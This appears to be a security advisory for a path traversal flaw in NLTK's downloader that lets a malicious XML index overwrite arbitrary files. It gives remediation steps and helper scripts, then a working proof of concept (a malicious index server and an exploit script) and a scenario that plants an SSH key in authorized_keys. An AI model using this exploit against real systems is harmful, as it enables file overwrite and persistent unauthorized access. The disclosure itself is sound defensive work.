NLTK's downloader trusts the `subdir` and `id` values in XML index files without validation, so an attacker who controls the index can overwrite arbitrary files on any machine whose NLP/ML pipeline downloads NLTK resources at runtime. Automated training infrastructure and CI/CD pipelines that use custom index URLs face direct system file compromise, including SSH key injection and credential overwrites. Audit all NLTK deployments immediately for custom `server_index_url` usage, pre-bake corpora into container images to eliminate runtime downloads, and enforce egress controls blocking outbound HTTP to NLTK index servers.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| nltk | pip | <= 3.9.2 | No patch |
Do you use nltk? You're affected.
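A quick way to check whether an environment falls inside the range in the table is to compare the installed version against 3.9.2. The following is a minimal sketch, not an official detection tool: the helper names `parse_version`, `in_vulnerable_range`, and `installed_nltk_version` are hypothetical, and the parser only looks at the leading numeric release components, so pre-release suffixes are ignored.

```python
import re
from importlib import metadata

# Upper bound of the vulnerable range listed in the table (<= 3.9.2).
LAST_VULNERABLE = (3, 9, 2)


def parse_version(version: str) -> tuple:
    """Return the leading numeric components, padded to at least three parts."""
    match = re.match(r"\d+(?:\.\d+)*", version.strip())
    if not match:
        raise ValueError(f"unrecognized version string: {version!r}")
    parts = tuple(int(p) for p in match.group(0).split("."))
    # Pad short versions such as "3.9" to (3, 9, 0) so comparisons are uniform.
    return parts + (0,) * (3 - len(parts))


def in_vulnerable_range(version: str) -> bool:
    """True when the version is at or below the last listed vulnerable release."""
    return parse_version(version) <= LAST_VULNERABLE


def installed_nltk_version():
    """Return the installed nltk version string, or None if nltk is absent."""
    try:
        return metadata.version("nltk")
    except metadata.PackageNotFoundError:
        return None
```

Calling `in_vulnerable_range(installed_nltk_version())` in each environment (after checking for `None`) gives the same answer as reading `pip show nltk` by hand. Because no patched release is listed, a version above 3.9.2 should be confirmed against the upstream advisory rather than assumed safe.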
Severity & Risk
Recommended Action
1. Inventory: Scan all Python environments and container images for NLTK <= 3.9.2 (`pip show nltk`).
2. Patch: No official patched version had been released as of CVE publication; monitor https://github.com/nltk/nltk for a release.
3. Workaround (preferred): Pre-download all required corpora and bake them into container images; disable runtime NLTK downloads in production entirely.
4. Harden: Enforce egress firewall rules blocking outbound HTTP to NLTK index servers; require HTTPS for any external data source used by ML pipelines.
5. Audit: Search the codebase for `Downloader(server_index_url=` with non-official URLs; treat each hit as a critical finding requiring immediate remediation.
6. Sandbox: Run NLP preprocessing containers with read-only bind mounts on sensitive filesystem paths (/etc, ~/.ssh, site-packages).
7. Detect: Add FIM (file integrity monitoring) alerts for writes to /etc/passwd, ~/.ssh/authorized_keys, and Python site-packages directories by ML service accounts.
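The audit step can be partly automated. The sketch below walks a source tree and reports every Python line that sets `server_index_url`. It is an illustration under simple assumptions: the function name `find_custom_index_urls` is hypothetical, the match is a plain regular expression rather than a syntax-aware analysis, and each hit still needs a human to decide whether the URL is the official index.

```python
import os
import re

# Matches the keyword argument named in the audit step, with optional spacing.
PATTERN = re.compile(r"server_index_url\s*=")


def find_custom_index_urls(root: str):
    """Yield (path, line_number, stripped_line) for lines setting server_index_url."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(".py"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as handle:
                    for number, line in enumerate(handle, start=1):
                        if PATTERN.search(line):
                            yield path, number, line.strip()
            except OSError:
                # Unreadable files are skipped rather than aborting the scan.
                continue
```

Iterating over `find_custom_index_urls("path/to/repo")` and printing each tuple produces a review list; the regular expression will also match comments and string literals, which is acceptable for a first-pass audit.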
Classification
Compliance Impact
Technical Details
NVD Description
## Vulnerability Description

The NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to:

1. **Arbitrary Directory Creation**: Create directories at arbitrary locations in the file system
2. **Arbitrary File Creation**: Create arbitrary files
3. **Arbitrary File Overwrite**: Overwrite critical system files (such as `/etc/passwd`, `~/.ssh/authorized_keys`, etc.)

## Vulnerability Principle

### Key Code Locations

**1. XML Parsing Without Validation** (`nltk/downloader.py:253`)

```python
self.filename = os.path.join(subdir, id + ext)
```

- `subdir` and `id` are directly from XML attributes without any validation

**2. Path Construction Without Checks** (`nltk/downloader.py:679`)

```python
filepath = os.path.join(download_dir, info.filename)
```

- Directly uses `filename` which may contain path traversal

**3. Unrestricted Directory Creation** (`nltk/downloader.py:687`)

```python
os.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)
```

- Can create arbitrary directories outside the download directory

**4. File Writing Without Protection** (`nltk/downloader.py:695`)

```python
with open(filepath, "wb") as outfile:
```

- Can write to arbitrary locations in the file system

### Attack Chain

```
1. Attacker controls remote XML index server
   ↓
2. Provides malicious XML: <package id="passwd" subdir="../../etc" .../>
   ↓
3. Victim executes: downloader.download('passwd')
   ↓
4. Package.fromxml() creates object, filename = "../../etc/passwd.zip"
   ↓
5. _download_package() constructs path: download_dir + "../../etc/passwd.zip"
   ↓
6. os.makedirs() creates directory: download_dir + "../../etc"
   ↓
7. open(filepath, "wb") writes file to /etc/passwd.zip
   ↓
8. System file is overwritten!
```

## Impact Scope

1. **System File Overwrite**

## Reproduction Steps

### Environment Setup

1. Install NLTK

   ```bash
   pip install nltk
   ```

2. Prepare malicious server and exploit script (see PoC section)

### Reproduction Process

**Step 1: Start malicious server**

```bash
python3 malicious_server.py
```

**Step 2: Run exploit script**

```bash
python3 exploit_vulnerability.py
```

**Step 3: Verify results**

```bash
ls -la /tmp/test_file.zip
```

## Proof of Concept

### Malicious Server (malicious_server.py)

```python
#!/usr/bin/env python3
"""Malicious HTTP Server - Provides XML index with path traversal"""
import os
import tempfile
import zipfile
from http.server import HTTPServer, BaseHTTPRequestHandler

# Create temporary directory
server_dir = tempfile.mkdtemp(prefix="nltk_malicious_")

# Create malicious XML (contains path traversal)
malicious_xml = """<?xml version="1.0"?>
<nltk_data>
  <packages>
    <package id="test_file"
             subdir="../../../../../../../../../tmp"
             url="http://127.0.0.1:8888/test.zip"
             size="100"
             unzipped_size="100"
             unzip="0"/>
  </packages>
</nltk_data>
"""

# Save files
with open(os.path.join(server_dir, "malicious_index.xml"), "w") as f:
    f.write(malicious_xml)

with zipfile.ZipFile(os.path.join(server_dir, "test.zip"), "w") as zf:
    zf.writestr("test.txt", "Path traversal attack!")


# HTTP Handler
class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == '/malicious_index.xml':
            self.send_response(200)
            self.send_header('Content-type', 'application/xml')
            self.end_headers()
            with open(os.path.join(server_dir, 'malicious_index.xml'), 'rb') as f:
                self.wfile.write(f.read())
        elif self.path == '/test.zip':
            self.send_response(200)
            self.send_header('Content-type', 'application/zip')
            self.end_headers()
            with open(os.path.join(server_dir, 'test.zip'), 'rb') as f:
                self.wfile.write(f.read())
        else:
            self.send_response(404)
            self.end_headers()

    def log_message(self, format, *args):
        pass


# Start server
if __name__ == "__main__":
    port = 8888
    server = HTTPServer(("0.0.0.0", port), Handler)
    print(f"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml")
    print("Press Ctrl+C to stop")
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        print("\nServer stopped")
```

### Exploit Script (exploit_vulnerability.py)

```python
#!/usr/bin/env python3
"""AFO Vulnerability Exploit Script"""
import os
import tempfile


def exploit(server_url="http://127.0.0.1:8888/malicious_index.xml"):
    download_dir = tempfile.mkdtemp(prefix="nltk_exploit_")
    print(f"Download directory: {download_dir}")

    # Exploit vulnerability
    from nltk.downloader import Downloader
    downloader = Downloader(server_index_url=server_url, download_dir=download_dir)
    downloader.download("test_file", quiet=True)

    # Check results
    expected_path = "/tmp/test_file.zip"
    if os.path.exists(expected_path):
        print(f"\n✗ Exploit successful! File written to: {expected_path}")
        print(f"✗ Path traversal attack successful!")
    else:
        print(f"\n? File not found, download may have failed")


if __name__ == "__main__":
    exploit()
```

### Execution Results

```
✗ Exploit successful! File written to: /tmp/test_file.zip
✗ Path traversal attack successful!
```
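The root cause described above is that `subdir` and `id` are joined onto the download directory with no containment check. A minimal sketch of such a check follows. It is an assumption about what a guard could look like, not NLTK's actual fix; `safe_join` is a hypothetical helper introduced only for illustration.

```python
import os


def safe_join(download_dir: str, subdir: str, filename: str) -> str:
    """Join the parts and refuse any result that escapes download_dir.

    Hypothetical guard: resolves symlinks and '..' segments with realpath,
    then requires the resolved target to sit under the resolved base.
    """
    base = os.path.realpath(download_dir)
    candidate = os.path.realpath(os.path.join(base, subdir, filename))
    # commonpath returns the longest shared ancestor of the two paths;
    # anything other than base means the candidate left the directory.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes download directory: {candidate}")
    return candidate
```

With this guard, a benign entry such as `subdir="corpora"` resolves normally, while the PoC's `subdir="../../../../../../../../../tmp"` raises `ValueError` before any directory is created or file is opened. An absolute `subdir` is rejected as well, because `os.path.join` discards the base when a later component is absolute.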
Exploitation Scenario
An adversary targeting an organization's NLP training pipeline identifies that the pipeline downloads NLTK resources at runtime from an HTTP (non-TLS) index server. The adversary performs a DNS hijack or BGP prefix hijack against the NLTK data hostname, redirecting index requests to a malicious server under their control. That server returns a crafted XML index whose package entry carries `subdir='../../../.ssh'` and `id='authorized_keys'`. When the nightly training job executes `nltk.download('punkt')`, NLTK constructs the path `download_dir + '../../../.ssh/authorized_keys.zip'`, creates the directory, and writes the attacker's crafted archive. After extraction, the attacker's SSH public key is present in `authorized_keys`, granting persistent, passwordless access to the ML training server, which typically holds sensitive training data, model artifacts, and credentials for internal APIs and data stores.
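A pipeline that must consume an external index can inspect it before handing it to the downloader. The sketch below flags package entries whose `id` or `subdir` look like traversal attempts. It is a hedged illustration: `suspicious_packages` and `_looks_unsafe` are hypothetical names, the rules are a conservative guess rather than an official schema, and the standard-library parser is used only for brevity.

```python
import xml.etree.ElementTree as ET


def _looks_unsafe(value: str, allow_separators: bool) -> bool:
    """Heuristic check for absolute paths, drive letters, and '..' segments."""
    normalized = value.replace("\\", "/")
    if normalized.startswith("/") or ":" in normalized:
        return True
    parts = normalized.split("/")
    if ".." in parts:
        return True
    # A package id is expected to be a bare name with no path separators.
    return not allow_separators and len(parts) > 1


def suspicious_packages(index_xml: str):
    """Return (id, subdir) pairs from <package> elements that look unsafe."""
    # Note: for fully untrusted XML, a hardened parser may be preferable.
    root = ET.fromstring(index_xml)
    findings = []
    for package in root.iter("package"):
        pkg_id = package.get("id", "")
        subdir = package.get("subdir", "")
        if _looks_unsafe(pkg_id, False) or _looks_unsafe(subdir, True):
            findings.append((pkg_id, subdir))
    return findings
```

Applied to the index in the scenario above, the entry with `subdir='../../../.ssh'` would be reported, and the job could abort before any download starts. A check like this complements, and does not replace, serving the index over HTTPS from a trusted host.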
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
References
- github.com/advisories/GHSA-469j-vmhf-r6v7
- github.com/nltk/nltk/security/advisories/GHSA-469j-vmhf-r6v7